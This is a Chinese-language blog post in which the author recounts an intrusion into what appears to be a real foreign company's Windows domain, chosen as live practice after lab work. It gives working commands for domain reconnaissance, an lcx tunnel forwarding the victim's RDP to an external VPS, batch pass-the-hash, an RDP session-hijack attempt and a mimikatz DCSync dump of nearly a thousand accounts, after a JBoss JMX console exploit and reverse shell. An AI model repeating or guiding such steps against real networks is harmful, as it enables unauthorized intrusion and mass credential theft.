實戰｜記一次完整的實戰滲透經歷

前言

由于最近學習內網,打了一些靶場,覺得還是挺枯燥的,就想找一個真實的環境練練手,在hxd的指引下,找了個站去練練手。

web打點

上來就是一個jboss界面

隨手一點,JMX Console竟然可以直接進。

這里最經典的玩法就是war包的遠程部署

找到jboss.deployment

進入后找到void addURL()

這里網上有很多文章寫這個玩法,這里就不復現了。

而前輩們早已寫出了集成化工具,放到腳本工具上跑一下看看

腳本顯示有兩個漏洞,其中一個就是JMX Console,直接讓腳本跑一下試試。

直接反彈了一個shell

由于這個shell比較脆弱,這里大致查查進程(無AV),看看管理員登錄時間和網卡信息等等。

可以看到是有域的

大致了解了情況后就想直接走后滲透,ping下度娘看下機器出不出網。

是出網的,由于是國外的機器ping就比較高,由于無殺軟,所以準備直接powershell上線

因為后來發現域很大,派生了一個會話來操作。

后滲透

本機信息收集

權限很高,上來先把hash抓到,心安一點。

一開始沒注意仔細看,這里已經發現當前主機所在的域名

由于是在域中,通過dns大致定位域控ip

不急著打域控,先做一波信息收集

域內信息收集

查詢域數量

查詢域內計算機列表

查詢域管賬戶net group "domain admins" /domain

查詢域控賬戶shell net group "domain controllers" /domain

這里04和53的后綴和剛剛DNS的后綴是一樣的,確認域控機器和賬戶

查詢域內用戶shell net user /domain

這一個域大概是三四百個用戶賬號,還是比較大的

查詢域所用主機名shell net group "domain computers" /domain

主機也有一百多臺

shell net accounts /domain查看域賬戶屬性,沒有要求強制更改密碼

shell nltest /domain_trusts域信任信息

shell net group /domain查看域中組信息

net use查看是否有ipc連接,net share查看共享

但是這里net session有幾臺,這是其他主機連接本機的ipc連接

spn掃描

機器在域內了,spn是不得不看一下的,比起端口掃描更精確,也更加隱蔽,這是由于SPN掃描通過域控制器的LDAP進行服務查詢,而這正是Kerberos票據行為的一部分。windows自帶了一款工具:setspn shell setspn -T xxxx -Q */*

這里就可以看到28機器有MSSQL服務,開啟1433端口

這里服務確實有點太多了,為了方便就將結果輸出到文本

將主機名列出 grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

橫向移動

上來先試試pth域控,無果,又嘗試掃描MS17010,也沒有洞,只能去先橫向其他的主機。通過上面net session,發現一個與當前主機用戶名相同的賬戶名稱,嘗試psexec傳遞hash 拿下該主機

這個session有一個作用就是盜取令牌,創建更高權限賬戶的進程,比如域管的cmd這種,但是這里我對比了net session的用戶名和域管用戶的用戶名,發現沒有一個是相同的,這個方法也就不去嘗試了。

批量掃一波MS17010,這個域的防御性比較高,只有零星幾臺有漏洞。

并且同網段沒有,只有0,2,3段各一臺,這里就像先把他們都先拿下,看OS版本應該是沒問題的,準備派生會話給msf去打。但天色一晚,歇息了,歇息了。

第二日，探測到內網三臺主機有ms17010的漏洞,準備深挖一波。

MS17010

cs上還是不太好打,派生個會話給msf。我的vps是windows server的,一開始下了個windows版的msf在vps上,但是添加路由的時候一直說我參數不對,就不知道咋回事。

還是算了,就搞個代理到本機用虛擬機kali吧。我用的是frp,vps當server,虛擬機當client

vps配置frps.ini 配一個端口

kali配置frpc.ini

然后vps上命令行啟動frps.exe frps.exe -c frps.ini

kali執行 frpc.exe -c frpc.ini

這樣就可以愉快的派生會話了,但是這里最后打的時候三臺主機沒一臺能打下來。首先三臺主機都沒有開啟管道,只能用eterblue模塊,最后也沒成功,這個域系統安全性還是比較高的。

pth

沒辦法,系統漏洞一臺拿不了,但是通過端口掃描發現大量主機開啟445端口,于是還是先pass the hash

批量撞一波

斷斷續續拿下不少主機

這時就一臺一臺的信息收集

rdp劫持會話

在27這臺主機上發現,有兩個會話,上面是我們已知賬號和明文密碼的普通域內賬戶,而下面這個用戶經過比對,為域中域管用戶。

由于我們自身權限也高,這里就想rdp上去劫持該會話(當時打的時候比較激動,沒注意看這個會話是失效的,這里還是記錄一下) 看眼時間,應該在休息呢

lcx設置代理 目標機器上 shell C:\Windows\system32\lcx.exe -slave 公網ip 7212 127.0.0.1 3389 vps上 lcx -listen 7212 5555

在cs上執行shell tscon 2 他說沒有權限。

在目標機器執行的時候提示錯誤的密碼,猜想大概是會話斷聯的原因。如果STATE是active應該是沒問題的。

拿下DC

將所有拿下的主機的hash全部dump出來,整合后發現有Administrator的賬戶hash,且是域中賬戶,而在域中Administrator是作為域管賬戶的。445端口開啟

嘗試pth

失敗了,如果不能pth這個hash將索然無味,又不能拿到明文 這里搞了很久,然后又回去信息收集。搞來搞去搞了很久,還是那么7、8臺主機,最后也是沒辦法,由于抓到了很多密碼,把所有Administrator用戶的hash全部pass了一遍,終于拿下了域控

導出ntds,抓下密碼,這里使用mimikatz lsadump::dcsync /domain:xxx /all /csv command

將近一千個用戶,RDP他們好像隨時都是連著的。

想3389上去看一下,找一個沒有連接的用戶

找到該用戶的hash拿去解密

成功連接

收工,準備吃晚飯了